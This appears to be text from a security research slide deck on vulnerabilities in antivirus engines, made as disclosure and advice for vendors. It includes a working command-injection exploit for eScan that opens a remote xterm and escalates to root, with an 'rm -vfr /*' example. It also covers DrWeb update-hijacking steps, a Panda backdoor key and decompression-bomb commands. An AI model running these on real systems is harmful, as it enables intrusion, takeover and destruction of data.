  • 6. Antivirus users ๎€Š What the average user of an antivirus thinks after installing his/her preferred AV engine: ๎€Š โ€œI'm safe because I use an antivirus productโ€. ๎€Š What some paranoid users of antivirus products thinks: ๎€Š โ€œI'm safe because I use various antivirus productsโ€. ๎€Š My opinion: ๎€Š Any software you install makes you a bit more vulnerable. AV engines are no exceptions. Just the opposite. ๎€Š ...
  • 7. Attack surface ๎€Š Fact: installing an application in your computer makes you a bit more vulnerable. ๎€Š You just increased your attack surface. ๎€Š If the application is local: your local attack surface increased. ๎€Š If the application is remote: your remote attack surface increased. ๎€Š If your application runs with the highest privileges, installs kernel drivers, a packet filter and tries to handle anything your computer may do... ๎€Š Your attack surface dramatically increased.
  • 8. Myths and reality ๎€Š Antivirus propaganda: ๎€Š โ€œWe make your computer safer with no performance penalty!โ€ ๎€Š โ€œWe protect against unknown zero day attacks!โ€. ๎€Š Reality: ๎€Š AV engines makes your computer more vulnerable with a varying degree of performance penalty. ๎€Š The AV engine is as vulnerable to zero day attacks as the applications it tries to protect from. ๎€Š And can even lower the operating system exploiting mitigations, by the way...
  • 9. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 10. Attacking antivirus engines ๎€Š AV engines, commonly, are written in non managed languages due to performance reasons. ๎€Š Almost all engines written in C and/or C++ with only a few exceptions, like the old MalwareBytes, written in VB6 (!?). ๎€Š It translates into buffer overflows, integer overflows, format strings, etc... ๎€Š Most AV engines installs operating system drivers. ๎€Š It translates into possible local escalation of privileges. ๎€Š AV engines must support a long list of file formats: ๎€Š Rar, Zip, 7z, Xar, Tar, Cpio, Ole2, Pdf, Chm, Hlp, PE, Elf, Mach-O, Jpg, Png, Bz, Gz, Lzma, Tga, Wmf, Ico, Cur... ๎€Š It translates into bugs in the parsers of such file formats.
  • 11. Attacking antivirus engines ๎€Š AV engines need to support such large list of file formats quickly and even better than the vendor. ๎€Š If an exploit for a new file format appears, customer will ask for support for such files as soon as possible. The longer it takes, the higher the odds of losing a customer moving on to another vendor. ๎€Š The producer doesn't need to โ€œsupportโ€ malformed files. The AV engine actually needs to do so. ๎€Š The vendor needs to handle malformed files but only to refuse them as repairing such files is an open door for vulnerabilities. ๎€Š Example: Adobe Acrobat
  • 12. Attacking antivirus engines ๎€Š Most (if not all...) antivirus engines run with the highest privileges: root or local system. ๎€Š If one can find a bug and write an exploit for the AV engine, (s)he just won root or system privileges. ๎€Š Sandboxes, virtual machines, etc... are extremely rare. ๎€Š Most antivirus engines updates via HTTP only protocols: ๎€Š If one can MITM the connection (for example, in a LAN) one can install new files and/or replace existing installation files. ๎€Š It often translates in completely owning the machine with the AV engine installed as updates are not commonly signed. Yes. They aren't. ๎€Š I will show later one of the many vulnerable products...
  • 13. Attacking antivirus engines ๎€Š AV engines often offer on-access scanners and behaviour based heuristic engines. ๎€Š Such scanners are usually implemented in 3 different ways: ๎€Š A sandbox on top of the AV's Intel x86 emulator. Very slow but, also, very little odds to attack such component. ๎€Š A driver to monitor file creation/access as well as process behaviour communicating with a user-level component. There is space for a possible EoP. ๎€Š Injecting libraries in all user-processes and hooking special functions. The easiest way to implement heuristic engines. ๎€Š Often, such โ€œprotectionโ€ methods make things worst than not having an antivirus engine. ๎€Š I'll show later on why with some real vulnerabilities...
  • 14. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 15. Vulnerabilities in AV engines ๎€Š Started around end of July/beginning of August to find vulnerabilities, for fun, in AV engines. ๎€Š In my spare time, some hours from time to time. ๎€Š Found remote and local vulnerabilities in 14 AV engines or AV products. ๎€Š Most of them in the first 2 months. ๎€Š I tested ~17 engines (I think, I honestly do not remember). ๎€Š It says it all. ๎€Š I'll talk about some of the vulnerabilities I found. ๎€Š The following are just a couple of them...
  • 16. AV engines vulnerabilities ๎€Š Avast: Heap overflow in RPM (reported, fixed and Bug Bounty paid) ๎€Š Avg: Heap overflow with Cpio (fixed...)/Multiple vulnerabilities with packers ๎€Š Avira: Multiple remote vulnerabilities ๎€Š BitDefender: Multiple remote vulnerabilities ๎€Š ClamAV:Infinite loop with a malformed PE (reported & fixed, patch available soon) ๎€Š Comodo: Heap overflow with Chm ๎€Š DrWeb: Multiple remote vulnerabilities ๎€Š ESET: Integer overflow with PDF/Multiple vulnerabilities with packers ๎€Š F-Prot: Heap overflows with multiple packers ๎€Š F-Secure: Multiple remote vulnerabilities (contacted, amazingly collaborative) ๎€Š Panda: Multiple local privilege escalations (reported and partially fixed) ๎€Š eScan: Remote command injection ๎€Š And many more...
  • 17. Broken AV products... ๎€Š The list is interminable... but, using this list http://www.av-comparatives.org/av-vendors/ ๎€Š ...anything using a 3rd party engine which is not Vipre, Norman, Cyren or Agnitum. ๎€Š Examples: QiHoo 360, F-Secure, G-Data, eScan, Emsisoft, BullGuard, Immunet, etc... ๎€Š + all the AV products using the AV engines mentioned in the previous slide. ๎€Š + some rare AV products like BkAV.
  • 18. How to find such vulnerabilities? ๎€Š I used initially a fuzzing testing suite of my own, Nightmare. ๎€Š http://www.joxeankoret.com/download/Nightmare-0.0.2.tar.gz ๎€Š I will eventually upload the code to GitHub.com ๎€Š Downloaded all the AV engines with a Linux version I was able to find. ๎€Š The core is always the same with the only exception of some heuristic engines. ๎€Š Also used some (dirty) tricks to run Windows only AV engines in Linux. ๎€Š Fuzzed the command line tool of each AV engine by simply using radamsa + the testing suite of ClamAV, many different EXE packers and some random file formats. ๎€Š Results: Dozens of remotely exploitable vulnerabilities. ๎€Š Also, I performed basic local and remote checks: ๎€Š ASLR, null ACLs, updating protocol, network services, etc...
  • 19. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 20. Fuzzing statistics ๎€Š A friend of mine convinced me to write a fuzzer and do a โ€œFuzzing explainedโ€ like talk for a private conference. ๎€Š Really simple fuzzing engine with a max. of 10 nodes. ๎€Š I'm poor... I cannot โ€œstart relatively small, with 300 boxesโ€ like Google people does. ๎€Š Used this fuzzing suite to fuzz various Linux based AV engines, those I was able to run and debug. ๎€Š For that talk I did fuzz/test the following ones: ๎€Š BitDefender, Comodo, F-Prot, F-Secure, Avast, ClamAV, AVG. ๎€Š Results...
  • 21. ClamAV ๎€Š Only 1 non reproducible crash :( ๎€Š Ran for about 2 weeks. ๎€Š Only 1 DOS (found manually) ๎€Š 1 infinite loop with a malformed PE. ๎€Š Asked to remain silent until a public patch is published. ๎€Š Honestly, I was very surprised. ๎€Š It seems they use fuzzing. ๎€Š Well done guys!
  • 22. F-Secure ๎€Š No crash at all. Only found 1 memory exhaustion bug with CPIO. ๎€Š Consumes up to 4GB of memory. ๎€Š I was sure I was doing something wrong and I verified it later on... ๎€Š Decided not to continue at that moment because it was too heavy and required root for debug.
  • 23. Avast ๎€Š 5 different bugs. ๎€Š Some of them disappeared quickly... ๎€Š 1 of them seemed to be exploitable. ๎€Š RPM Support. Bug reported and fixed. ๎€Š This is one of the AV engines I fuzzed the most: ~1 month. ๎€Š They have a Bug Bounty! ๎€Š Only reason why I contacted them.
  • 24. Comodo AV ๎€Š Only 5 crashes. ๎€Š 2 different bugs. ๎€Š 1 seems to be exploitable. ๎€Š Heap overflow with CHM files when uncompressing data... ๎€Š IMHO, it didn't fail more because they don't support anything...
  • 25. F-Prot ๎€Š 4 different bugs. ๎€Š Only left for around 2/3 hours. ๎€Š The bugs seems to be all exploitables. ๎€Š Armadillo, PECompact, ASPack and Yoda's Protector unpackers. ๎€Š Crashes at memcpy coming from different paths...
  • 26. AVG ๎€Š Hundred of crashes, fuzzed โ€œmanuallyโ€ :( ๎€Š It sends crash reports automatically :/ I hate you. ๎€Š It needs to be fed via STDIN. Annoying. ๎€Š 4 different bugs found. ๎€Š 2 of them seem to be exploitable. ๎€Š CPIO and XAR files support. ๎€Š 1st one fixed recently :/ ๎€Š XAR one still 0day.
  • 27. BitDefender ๎€Š +1500 crashes. ๎€Š 7 different bugs. ๎€Š Most of them with EXE unpackers and EXE uncompressors. ๎€Š Thinstall and Shrinker, for example. ๎€Š 2 of them seems to be exploitable.
  • 28. More about fuzzing AV engines ๎€Š Most AV engines are Windows only. ๎€Š However, we can still fuzz them in non Windows based environments (Linux requires less memory and disk). ๎€Š What I have done: ๎€Š Try to run it with Wine. If it works use WineDBG + GDB server and connect IDA or GDB to the target. ๎€Š If it doesn't work, reverse engineer the core engine and write a more simple wrapper for it. ๎€Š Very time consuming but the best option. ๎€Š ...
  • 29. More about fuzzing AV engines ๎€Š AV engines take a long while loading the core. They need to load all the signatures, unpack/decrypt them in memory, etc... ๎€Š The solution: use in-memory fuzzing. ๎€Š Reverse engineer your favourite AV's core engine and find the functions where files are being scanned. ๎€Š Debug the target application with IDA and use the AppCall feature to call those functions with your own input. For example. ๎€Š You don't need to restart it again and again. Just wait for it to crash while continuously feeding fuzzed inputs. ๎€Š However, it may cause some false positives: ๎€Š Some files/buffers can be discarded at some point before that scanning routine.
  • 30. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 31. Exploiting AV engines ๎€Š What will be briefly covered: ๎€Š Remote exploitation. ๎€Š What will be not: ๎€Š Local exploitation of local user-land or kernel-land vulnerabilities. ๎€Š I have no knowledge about kernel-land, sorry. ๎€Š Later on, I will discuss some local vulnerability and give details about how to exploit it but it isn't kernel stuff and is too easy to exploit.
  • 32. Exploiting AV engines ๎€Š Exploiting an AV engine is like exploiting any other client-side application. ๎€Š Is not like exploiting a browser or a PDF reader. ๎€Š Is more like exploiting an Office file format. ๎€Š Exploiting memory corruptions in client-side applications remotely can be quite hard nowadays due to ASLR. ๎€Š However, AV engines makes too many mistakes too often so, don't worry ;) ๎€Š ...
  • 33. Exploiting AV engines ๎€Š In general, AV engines are all compiled with ASLR enabled. ๎€Š But it's common that only the core modules are compiled with ASLR. ๎€Š Not the GUI related programs and libraries, for example. ๎€Š Some libraries of the core of some AV engines are not ASLR enabled. ๎€Š Check your target/own product, there isn't only one ;)
  • 34. Exploiting AV engines ๎€Š Even in โ€œmajorโ€ AV engines... ๎€Š ...there are non ASLR enabled modules. ๎€Š ...there are RWX pages at fixed addresses. ๎€Š ...they disable DEP. ๎€Š Under certain conditions, of course. ๎€Š The condition, often, is the emulator.
  • 35. Exploiting AV engines ๎€Š The x86 emulator is a key part of an AV engine. ๎€Š It's used to unpack samples in memory, to determine the behaviour of an executable program, etc... ๎€Š Various AV engines create RWX pages at fixed addresses and disable DEP as long as the emulator is used. ๎€Š Very common. Does not apply to only some random AV engine. ๎€Š ...
  • 36. Exploiting AV engines (more tips) ๎€Š By default, an AV engine will try to unpack compressed files and scan the files inside. ๎€Š A compressed archive file (zip, tgz, rar, ace, etc...) can be created with several files inside. ๎€Š The following is a common AV engines exploitation scenario: ๎€Š Send a compressed zip file. ๎€Š The very first file inside forces the emulator to be loaded and used. ๎€Š The 2nd one is the real exploit.
  • 37. Exploiting AV engines ๎€Š AV engines implement multiple emulators. ๎€Š There are emulators for x86, AMD64, ARM, JavaScript, VBScript, โ€ฆ. in most of the โ€œmajorโ€ AV engines. ๎€Š The emulators, as far as I can tell, cannot be used to perform heap spraying, for example. But they expose a considerable attack surface. ๎€Š It's common to find memory leaks inside the emulators, specially in the JavaScript engine. ๎€Š They can be used to construct complex exploits as we have a programming interface to craft inputs to the AV engine.
  • 38. Exploiting AV engines: Summary ๎€Š Exploiting AV engines is not different to exploiting other client-side applications. ๎€Š They don't have/offer any special self-protection. They rely on the operating system features (ASLR/DEP) and nothing else. ๎€Š And sometimes they even disable such features. ๎€Š There are programming interfaces for exploit writers: ๎€Š The emulators: x86, AMD-64, ARM, JavaScript, ... usually. ๎€Š Multiple files doing different actions each can be send in one compressed file as long as the order inside it is kept. ๎€Š Owning the AV engine means getting root or system in all AV engines I tested. There is no need for a sandbox escape, in general.
  • 39. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 40. Details about some vulnerabilities in AV engines and products... Extracted from http://theoatmeal.com/comics/grump Copyright ยฉ Matthew Inman
  • 41. Disclaimer ๎€Š I'm only showing a couple of my vulnerabilities. ๎€Š I have the bad habit of eating 3 times a day... ๎€Š I contacted 5 vendors for different reasons: ๎€Š Avast. They offer a Bug Bounty. Well done guys! ๎€Š ClamAV. Their antivirus is Open Source. ๎€Š Panda. I have close friends there. ๎€Š Ikarus, ESET and F-Secure. They contacted me an asked for help nicely. ๎€Š I do not โ€œresponsiblyโ€ contact multi-million dollar companies. ๎€Š I don't give my research for free. ๎€Š Audit your products...
  • 42. Local Escalation of Privileges
  • 43.
  • 44. Example: Panda Multiple local EoPs ๎€Š In the product Global Protection 2013 there are various processes running as SYSTEM. ๎€Š Two of those processes have a NULL process ACL: ๎€Š WebProxy.EXE and SrvLoad.EXE ๎€Š We can use CreateRemoteThread to inject a DLL, for example. ๎€Š Two very easy local escalation of privileges. ๎€Š But the processes are โ€œprotectedโ€ by the shield.
  • 45. Example: Panda Multiple local EoPs ๎€Š Another terrible bug: The Panda's installation directory have write privileges for all users. ๎€Š However, again, the directory is โ€œprotectedโ€ by the shield... ๎€Š What is the fucking shield? ๎€Š ...
  • 46. Example: Panda Multiple local EoPs ๎€Š The Panda shield is a driver that protects some Panda owned processes, the program files directory, etc... ๎€Š It reads some registry keys to determine if the shield is enabled or disabled. ๎€Š But... the registry key is world writeable. ๎€Š Also, it's funny, but there is a library (pavshld.dll) with various exported functions... ๎€Š ...
  • 47. Example: Panda Multiple local EoPs ๎€Š All exported functions contains human readable names. ๎€Š All but the 2 first functions. They are called PAVSHLD_001 and 002. ๎€Š Decided to reverse engineer them for obvious reasons... ๎€Š The 1st function is a backdoor to disable the shield. ๎€Š It receives only 1 argument, a โ€œsecret keyโ€ (GUID): ๎€Š ae217538-194a-4178-9a8f-2606b94d9f13 ๎€Š If the key is correct, then the corresponding registry keys are written. ๎€Š Well, is easier than writing yourself the registry entries...
  • 48. MOAR PANDAZ ๎€Š There are more stupid bugs in this AV engine... ๎€Š For example, no library is compiled with ASLR enabled. ๎€Š One can write a reliable exploit for Panda without any real big effort. ๎€Š And, also, one can write an exploit targeting Panda Global Protection users for any program. ๎€Š Why? Because the product injects 3 libraries without ASLR enabled in all processes. Yes.
  • 49. Panda ๎€Š I reported the vulnerabilities because I have friends there. ๎€Š Some of them are (supposedly) fixed, others not... ๎€Š The shield backdoor. ๎€Š The permissions of the Panda installation directory. ๎€Š The injection of non randomized libraries bug that allows writing targeted exploits remains... ๎€Š Also, during my latest testing of their very last version, other local vulnerabilities appeared...
  • 50. ASLR related (Address Space Layout Randomization)
  • 51. ASLR disabled ๎€Š We already discussed that Panda Global Protection doesn't enable ASLR for all modules. ๎€Š Do you believe this is an isolated problem of just one antivirus product? ๎€Š As it is common with antivirus products/engines, such problems are not specific...
  • 53. Forticlient ๎€Š The process av_task.exe is the actual AV scanner...
  • 54. Forticlient ๎€Š Most libraries and binaries in Forticlient doesn't have ASLR enabled. ๎€Š Exploiting Forticlient with so many non ASLR enabled modules once a bug is found is trivial. ๎€Š You may think that this is a problem that doesn't happen to the โ€œbigโ€ ones... ๎€Š Think again.
  • 55. 2 random AVs nobody uses...
  • 56. Kaspersky ๎€Š Libraries avzkrnl.dll and module vlns.kdl, a vulnerability scanner (LOL), are not ASLR enabled. ๎€Š One can write a reliable exploit for Kaspersky AV without any real effort.
  • 57. BitDefender ๎€Š It's kind of easier to write an exploit for BitDefender... โ€œSecurity serviceโ€ my ass...
  • 58.
  • 59. BKAV ๎€Š BKAV is a Vietnamese antivirus product. ๎€Š Gartner recognizes it as a โ€œCool vendor in Emerging Marketsโ€. ๎€Š I recognize it as a โ€œCool antivirus for writing targeted exploitsโ€...
  • 60. BKAV ๎€Š They don't have ASLR enabled for their services...
  • 61. BKAV ๎€Š And, like Panda, they inject a non ASLR enabled library system wide, the Bkav โ€œfirewallโ€ engine... ๎€Š ...miserably failing at securing your computer.
  • 62. AV developers writing security software
  • 63. Remote Denial of Service
  • 64.
  • 65. Examples: ClamAV DOS ๎€Š There is a bug in ClamAV scanning some resource directory in PE files. ๎€Š I have been asked to wait until there is a public patch. ๎€Š It's fixed in their private repository but the patch is big so it needs some proper testing. ๎€Š Sorry, I cannot give all the details yet :( ๎€Š Found via dumb ass fuzzing. ๎€Š Reported. Because it's Open Source... ๎€Š https://bugzilla.clamav.net/show_bug.cgi?id=10650 ๎€Š The vulnerability was nicely handled by the ClamAV team (now Cisco).
  • 66.
  • 67. Decompression bombs (multiple AVs) ๎€Š Do you remember them? If I remember correctly, the 1st discussion in Bugtraq about it was in 2001. ๎€Š A compressed file with many compressed files inside or with really big files inside. ๎€Š It can be considered a remote denial of service. ๎€Š Do you think AV engines are not vulnerable any more to such bugs with more than +10 years? ๎€Š In this case, you're wrong. ๎€Š Look to the following table....
  • 68. Failing AVs ZIP GZ BZ2 RAR 7Z ESET X (***) X (***) BitDefender X Sophos X (*) X X X Comodo X AVG X Ikarus X Kaspersky X (**) * Sophos finishes after ~30 seconds. In a โ€œtestingโ€ machine with 16 logical CPUs and 32 GB of RAM. ** Kaspersky creates a temporary file. A 32GB dumb file is a ~3MB 7z compressed one. *** In my latest testing, ESET finishes after 1 minute with each file in my โ€œsmall testing machineโ€.
  • 69. Decompression bombs: How to ๎€Š To create a simple decompression bomb in Unix issue the following commands: $ truncate -s 8589934592 dumb # 8GB $ 7z/gzip/bzip2/rar/lcab/compress/xxx dumb ๎€Š That's all. The result file is always less than 10 MB. ๎€Š I couldn't believe that still nowadays antivirus engines failed at this trivial โ€œattackโ€ when I โ€œdiscoveredโ€ this...
  • 70.
  • 71. BitDefender engine ๎€Š BitDefender is a Romanian antivirus engine. ๎€Š Their AV core is the most widely distributed AV engine in other AV products. ๎€Š To name a few: F-Secure, G-Data, QiHoo 360, eScan, LavaSoft, Immunet, ... ๎€Š It suffers from a number of vulnerabilities like almost all other AV engines/products out there. ๎€Š Finding vulnerabilities in this engine is trivial. ๎€Š An easy example...
  • 72. BitDefender bugs ๎€Š Modifying 2 DWORDs in a PE file packed with Shrinker3 packer will make it to crash: ๎€Š Those bytes are used to calculate the file and sections alignment of the new, in memory, unpacked PE file. ๎€Š When set to 0xFFFFFFFF and 0xFFFFFFF, both file and sections alignment will be set to 0...
  • 73. BitDefender bugs ๎€Š ...and their values will be used, later on, in some arithmetic operations: ๎€Š Those 2 bugs are trivial to discover.
  • 74. BitDefender notes ๎€Š This and all BitDefender's bugs don't affect exclusively BitDefender's products. ๎€Š It affects many AV products out there as previously mentioned. ๎€Š Adding a new AV engine to your product may sound โ€œcoolโ€ but you're making 3rd party bugs yours. ๎€Š And, by the way, you didn't audit it before adding to your product... ๎€Š Otherwise, I doubt you would have added it.
  • 75.
  • 76. ESET Nod32 ๎€Š ESET Nod32 is a Slovak AV engine. ๎€Š Like most AV engines it suffers from a number of vulnerabilities that can be trivially discovered. ๎€Š One little example: a malformed PDF file. ๎€Š A negative or big value for any element of a /W(idth) element with arrays will make it to crash. ๎€Š A simple remote denial of service.
  • 77. ESET Nod32 bug with PDF files ๎€Š According to ESET sources they use fuzzing as part of QA. ๎€Š I think they are not doing it very well... ๎€Š Finding this bug is trivial, like all the ones I previously shown.
  • 78.
  • 79. F-Secure ๎€Š F-Secure is an antivirus from Finnland. ๎€Š They use 2 AV engines: their own one and the BitDefender's one. ๎€Š So, the previous bug, the BitDefender's one, also affects this AV product. ๎€Š Like with the whole majority of AV engines out there, there are rather easy to discover bugs in their (own) engine. ๎€Š Let's see a simple vulnerability they fixed in February.
  • 80. F-Secure bug with InnoSetup ๎€Š There was a little bug handling some InnoSetup installers. Bug is at InnoDecoder::IsInnoNew(). ๎€Š A size for a call to FMalloc can be controlled:
  • 81. F-Secure bug with InnoSetup ๎€Š A negative size will make malloc to fail but it will anyway memset the buffer... ๎€Š Basically, memset(NULL, '0', negative_size). ๎€Š Another bug trivial to discover by any means.
  • 82. Proof of concepts ๎€Š Proof of concepts for the last discussed bugs can be downloaded from here: ๎€Š http://www.joxeankoret.com/download/3ea0506f0e583c ๎€Š Shortened URL: ๎€Š http://x90.es/7Lm
  • 84.
  • 85. DrWeb antivirus ๎€Š DrWeb is a Russian antivirus. Used, for example, by the largest bank (Sberbank) and the largest search engine in Russia (Yandex) + the Duma, to name a few customers. ๎€Š More of their propaganda:
  • 86. DrWeb updating protocol ๎€Š DrWeb updates via HTTP only. They do not use SSL/TLS. ๎€Š It downloads a catalog file first: ๎€Š Example for Linux: ๎€Š http://<server>/unix/700/drweb32.lst.lzma ๎€Š In the catalog file there is a number of updatable files + a hash for them: ๎€Š VDB files (Virus DataBases). ๎€Š DrWeb32.dll. ๎€Š The hash is, actually, CRC32 and no component is signed, even the DrWeb32.dll library.
  • 87. DrWeb updating protocol ๎€Š The โ€œhighest grade of certificateโ€ requires the highest grade of check for their database files and libraries: CRC32. โ€œHigh standardsโ€. ๎€Š To exploit in a LAN intercept the following domains: ๎€Š update.nsk1.drweb.com ๎€Š update.drweb.com ๎€Š update.msk.drweb.com ๎€Š update.us.drweb.com ๎€Š update.msk5.drweb.com ๎€Š update.msk6.drweb.com ๎€Š update.fr1.drweb.com ๎€Š update.us1.drweb.com ๎€Š update.nsk1.drweb.com ๎€Š ...and replace drweb32.dll with your โ€œmodifiedโ€ (lzma'ed) version.
  • 88. DrWeb updating protocol ๎€Š Exploiting it is rather easy with ettercap and a quick Python web server + Unix lzma tool. ๎€Š You only need to calculate the CRC32 checksum and compress (lzma) the drweb32.dll file. ๎€Š I tested the bug under Linux: full code execution is possible. ๎€Š Though you need to be in a LAN to be able to do so, obviously. ๎€Š In my opinion, this updating protocol is horrible.
  • 89.
  • 90.
  • 91. eScan for Linux ๎€Š eScan is an AV product from USA (MicroWorld Technologies). ๎€Š I was bored some random night in Singapore and found that the eScan product have a Linux version. ๎€Š I downloaded and installed it (~1 hour because of the awful hotel's connection). ๎€Š Then I started checking what it installs, finding for SUID binaries, etc... ๎€Š They use BitDefender and ClamAV engines, they don't have their own engine so, no need to test the scanners. ๎€Š I already had vulnerabilities for such engines... ๎€Š They install a Web server for management and a SUID binary called: ๎€Š /opt/MicroWorld/sbin/runasroot
  • 92. eScan for Linux ๎€Š The SUID binary allows to execute root commands to the following users: ๎€Š root ๎€Š mwconf (created during installation). ๎€Š The eScan management application (called MwAdmin) is so flawed I decided to stop at the first RCE... ๎€Š A command injection in the login form (PHP). ๎€Š In a โ€œsecurityโ€ product. ๎€Š Yes.
  • 93. eScan for Linux login page
  • 94. eScan for Linux remote root ๎€Š This specific bug requires to know/guess an existing user. Not so hard. ๎€Š The user name and the password are used to construct an operating system command executed via the PHP's function โ€œexecโ€. ๎€Š I was not able to inject in the user name. ๎€Š But I was able to inject in the password. ๎€Š ...
  • 95. Source code of login.php (I)
  • 96. Source code of login.php (II) ๎€Š The password sent by the user is passed to check_user: ๎€Š There are some very basic checks against the password. ๎€Š Specially for shell escape characters. ๎€Š But they forgot various other characters like ';'.
  • 97. Source code of common_functions.php ๎€Š Then, the given password is used in the function check_user like this:
  • 98. eScan for Linux RCE ๎€Š My super-ultra-very-txupi-complex exploit for it: $ xhost + $ curl โ€“data "product=1&uname=valid@user.com&pass=1234567; DISPLAY=YOURIP:0;xterm;" http://target:10080/login.php ๎€Š Once you're in, run this to escalate privileges: $ /opt/MicroWorld/sbin/runasroot /usr/bin/xterm ๎€Š Or anything else you want... $ /opt/MicroWorld/sbin/runasroot rm -vfr /*
  • 99. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 100. Conclusions ๎€Š In general, AV software... ๎€Š ...doesn't make you any safer against skilled attackers. ๎€Š ...increase your attack surface. ๎€Š ...make you more vulnerable to skilled attackers. ๎€Š ...are as vulnerable to attacks as any other application. ๎€Š Some AV software... ๎€Š ...may lower your operating system protections. ๎€Š ...are plagued of both local and remote vulnerabilities. ๎€Š Some AV companies... ๎€Š ...don't give a fuck about security in their products.
  • 101. Breaking antivirus software ๎€Š Introduction ๎€Š Attacking antivirus engines ๎€Š Finding vulnerabilities ๎€Š Initial experiments ๎€Š Exploiting antivirus engines ๎€Š Antivirus vulnerabilities ๎€Š Conclusions ๎€Š Recommendations
  • 102. Recommendations for AV users ๎€Š Do not blindly trust your AV product. ๎€Š BTW, do not trust your AV product. ๎€Š Also, do not trust your AV product. ๎€Š Nope. I cannot stress it enough. ๎€Š Isolate the machines with AV engines used for gateways, network inspection, etc... ๎€Š Audit your AV engine or ask a 3rd party to audit the AV engine you want to deploy in your organization.
  • 103. Recommendations for AV companies ๎€Š Audit your products: source code reviews & fuzzing. ๎€Š No, AV comparatives and the like are not even remotely close to this. ๎€Š Running a Bug Bounty, like Avast, is a very good idea too. ๎€Š Do not use the highest privileges possible for scanning network packets, files, etc... ๎€Š You don't need to be root/system to scan a network packet or a file. ๎€Š You only need root/system to get the contents of that packet or file. ๎€Š Send the network packet or file contents to another, low privileged or sandboxed, process.
  • 104. Recommendations for AV companies ๎€Š Run dangerous code under an emulator, vm or, at the very least, in a sandbox. I only know 2 AVs using this approach. ๎€Š Dangerous code: file parsers written in C/C++ code. ๎€Š If one finds a vulnerability and it's running inside an emulator/sandbox one needs also an escape vulnerability to completely own the AV engine. ๎€Š Why is it harder to exploit browsers or document readers than security products? ๎€Š Another option could be to use a โ€œsaferโ€ language. Some AV products, actually, are doing this: Using Lua, for example. ๎€Š Do not trust your own processes. They can be owned. ๎€Š I'm not talking about signing the files. ๎€Š I'm talking about your AV's running processes.
  • 105. Recommendations for AV companies ๎€Š Do not use plain HTTP for updating your product. ๎€Š Use SSL/TLS. ๎€Š Also, digitally sign all files. ๎€Š No, CRC is not a signature. Really. ๎€Š ...and verify there is nothing else after the signature.
  • 106. Recommendations for AV companies ๎€Š Drop old code that is of no use today or make this code not available by default. ๎€Š Code for MS-DOS era viruses, packers, protectors, etc... ๎€Š Parsers for file format vulnerabilities in completely unsupported products nowadays. ๎€Š Such old code not touched in years is likely to have vulnerabilities. ๎€Š This is up to you: what do you prefer? Fail at stupid AV comparatives (AV-Test, anyone?) not detecting viruses from the Jurassic or have a more secure product?